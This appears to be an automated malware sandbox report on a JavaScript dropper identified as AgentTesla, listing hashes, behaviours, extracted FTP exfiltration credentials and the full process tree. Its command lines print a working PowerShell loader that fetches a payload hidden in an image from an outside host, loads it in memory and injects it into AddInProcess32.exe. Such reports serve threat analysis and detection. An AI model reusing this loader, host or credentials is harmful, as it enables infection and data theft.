Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system -
submitted
25-04-2024 03:42
Static task
static1
Behavioral task
behavioral1
Sample
comprobante_9887887.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
comprobante_9887887.js
Resource
win10v2004-20240412-en
General
-
Target
comprobante_9887887.js
-
Size
5KB
-
MD5
39f9206f83d0141caec19300d528fd57
-
SHA1
c78e336bd902973b64108eb003aeb0a92e48bf26
-
SHA256
a09d8c7cd5db2add2d2aba1810a14afb1f602dd81db92e6f4889d93dfaf455f0
-
SHA512
b4670af49b60cde81064d4971498b84d38f94b35b49b01c97573eb3ed73870cf0afbb0496f174addec58f3ef435cbf78dd4a20a09f930d44196f72142e9a5097
-
SSDEEP
96:QcbRUp/NhXhqan4JvvommR39pfh24meHBhmeRqmeRdmeRbmeRoBgmeFFcKRUpl9h:z6rxqqpz+D60S
Malware Config
Extracted
agenttesla
Protocol: ftp
Host: ftp://ftp.fosna.net
Port: 21
Username: [email protected]
Password: =A+N^@~c]~#I
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
-
Blocklisted process makes network request 5 IoCs
Processes: wscript.exe, powershell.exe
flow  pid   process
3     4388  wscript.exe
5     4388  wscript.exe
8     4388  wscript.exe
14    4892  powershell.exe
30    4892  powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: wscript.exe
description        ioc                                                                                                 process
Key value queried  \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Control Panel\International\Geo\Nation  wscript.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
56    ip-api.com
-
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
description                          pid   process         target process
PID 4892 set thread context of 4684  4892  powershell.exe  AddInProcess32.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes: powershell.exe, powershell.exe, AddInProcess32.exe
pid   process
1096  powershell.exe
1096  powershell.exe
4892  powershell.exe
4892  powershell.exe
4684  AddInProcess32.exe
4684  AddInProcess32.exe
4684  AddInProcess32.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes: powershell.exe, powershell.exe, AddInProcess32.exe
description              pid   process
Token: SeDebugPrivilege  1096  powershell.exe
Token: SeDebugPrivilege  4892  powershell.exe
Token: SeDebugPrivilege  4684  AddInProcess32.exe
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes: wscript.exe, powershell.exe, powershell.exe
description                        pid   process         target process
PID 4388 wrote to memory of 1096   4388  wscript.exe     powershell.exe
PID 4388 wrote to memory of 1096   4388  wscript.exe     powershell.exe
PID 1096 wrote to memory of 4892   1096  powershell.exe  powershell.exe
PID 1096 wrote to memory of 4892   1096  powershell.exe  powershell.exe
PID 4892 wrote to memory of 4684   4892  powershell.exe  AddInProcess32.exe
PID 4892 wrote to memory of 4684   4892  powershell.exe  AddInProcess32.exe
PID 4892 wrote to memory of 4684   4892  powershell.exe  AddInProcess32.exe
PID 4892 wrote to memory of 4684   4892  powershell.exe  AddInProcess32.exe
PID 4892 wrote to memory of 4684   4892  powershell.exe  AddInProcess32.exe
PID 4892 wrote to memory of 4684   4892  powershell.exe  AddInProcess32.exe
PID 4892 wrote to memory of 4684   4892  powershell.exe  AddInProcess32.exe
PID 4892 wrote to memory of 4684   4892  powershell.exe  AddInProcess32.exe
Processes
-
Level 1: C:\Windows\system32\wscript.exe
Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\comprobante_9887887.js
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4388 -
  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1096 -
    Level 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778', 'https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.44446ezab/77.06.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4892 -
      Level 4: C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
      Command line: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:4684
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 3KB
MD5: f41839a3fe2888c8b3050197bc9a0a05
SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: c20ac38ae3022e305b8752804aadf486
SHA1: 4c144d6cfafb5c37ab4810ff3c1744df81493cdb
SHA256: 03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf
SHA512: c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t3utb3uc.gfd.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1096-19-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmp
Filesize: 10.8MB
-
memory/1096-20-0x0000021E05C60000-0x0000021E05C70000-memory.dmp
Filesize: 64KB
-
memory/1096-21-0x0000021E05C60000-0x0000021E05C70000-memory.dmp
Filesize: 64KB
-
memory/1096-9-0x0000021E05CA0000-0x0000021E05CC2000-memory.dmp
Filesize: 136KB
-
memory/1096-41-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmp
Filesize: 10.8MB
-
memory/4684-44-0x00000000056C0000-0x00000000056D0000-memory.dmp
Filesize: 64KB
-
memory/4684-47-0x0000000006A60000-0x0000000006AF2000-memory.dmp
Filesize: 584KB
-
memory/4684-34-0x0000000000400000-0x0000000000442000-memory.dmp
Filesize: 264KB
-
memory/4684-50-0x00000000056C0000-0x00000000056D0000-memory.dmp
Filesize: 64KB
-
memory/4684-49-0x0000000074E60000-0x0000000075610000-memory.dmp
Filesize: 7.7MB
-
memory/4684-42-0x0000000074E60000-0x0000000075610000-memory.dmp
Filesize: 7.7MB
-
memory/4684-43-0x0000000005C80000-0x0000000006224000-memory.dmp
Filesize: 5.6MB
-
memory/4684-48-0x0000000006A00000-0x0000000006A0A000-memory.dmp
Filesize: 40KB
-
memory/4684-45-0x00000000056D0000-0x0000000005736000-memory.dmp
Filesize: 408KB
-
memory/4684-46-0x0000000006970000-0x00000000069C0000-memory.dmp
Filesize: 320KB
-
memory/4892-23-0x000002655D620000-0x000002655D630000-memory.dmp
Filesize: 64KB
-
memory/4892-22-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmp
Filesize: 10.8MB
-
memory/4892-37-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmp
Filesize: 10.8MB
-
memory/4892-33-0x0000026520000000-0x00000265202C0000-memory.dmp
Filesize: 2.8MB